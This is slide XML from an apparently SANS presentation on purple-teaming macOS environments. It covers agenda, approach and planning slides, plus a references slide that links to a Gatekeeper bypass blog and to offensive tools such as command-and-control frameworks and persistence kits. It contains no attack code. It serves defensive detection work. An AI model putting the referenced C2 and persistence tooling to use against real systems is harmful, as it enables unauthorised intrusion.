            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborate closely with red &amp; blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify gaps in visibility and detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build and test new detections </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{423EE9DC-B0DE-5747-AAA4-A9576CE35B2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All in a Nutshell (film) - D23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C4B971-9BAC-1C43-B2CD-C290614CAEB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77104" y="2419067"/>
            <a:ext cx="3818861" cy="2817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20893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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="218140"/>
            <a:ext cx="10415587" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8793116A-4B13-F648-A13D-1BA7EA50F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1765469"/>
            <a:ext cx="11862486" cy="4469322"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blog On This Content: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://medium.com/red-teaming-with-a-blue-team-mentality/purple-team-candidates-for-modern-tech-environments-69a78a125d38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blog On Gatekeeper Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Helpful Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Swift-Attack tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/Swift-Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mythic C2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/its-a-feature/Mythic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent Swift: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/Persistent-Swift</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D00MFist’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PersistentJXA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/D00MFist/PersistentJXA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MacC2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/MacC2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2 Cradle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/C2_Cradle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DC2798-8BDC-9045-B3E8-6064B771263E}"/>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25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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="8392297" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outside-In Attack Paths &amp; Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Attack Paths &amp; Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7085BE65-6BE1-CB4C-88B5-E045A538E4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43871" y="2360139"/>
            <a:ext cx="4984745" cy="2909845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85A6F72-C8E4-B249-9076-7EBB1B9545C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146108" y="2360139"/>
            <a:ext cx="2607276" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LISTENING I AM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FE96AD-320B-C74C-B63F-5BA713A5C59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044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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449860" y="1418925"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank You!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E9D0284-7E7E-5F47-827A-190FA2F0EE4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026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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412790" y="1041400"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D5D484A-0052-7E4A-BAD9-E377BB3792A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57596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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435317" y="1572959"/>
            <a:ext cx="7991991" cy="5184889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborative Effort Between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify Focus Areas/Areas of Concern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timeline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agree on test cases and outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agree on roles and responsibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are equally in the know	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55D905B-BE83-FE42-B830-7811A0A9B1B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hen Should Our Students Use Technology for Note Taking? | Edtech">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24293DD-71FA-9D43-A6BD-0D7AF04D079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96274" y="2266949"/>
            <a:ext cx="3758323" cy="2500993"/>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30432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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="100151"/>
            <a:ext cx="10515600" cy="759340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Planning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435317" y="1240443"/>
            <a:ext cx="6494372" cy="5184889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
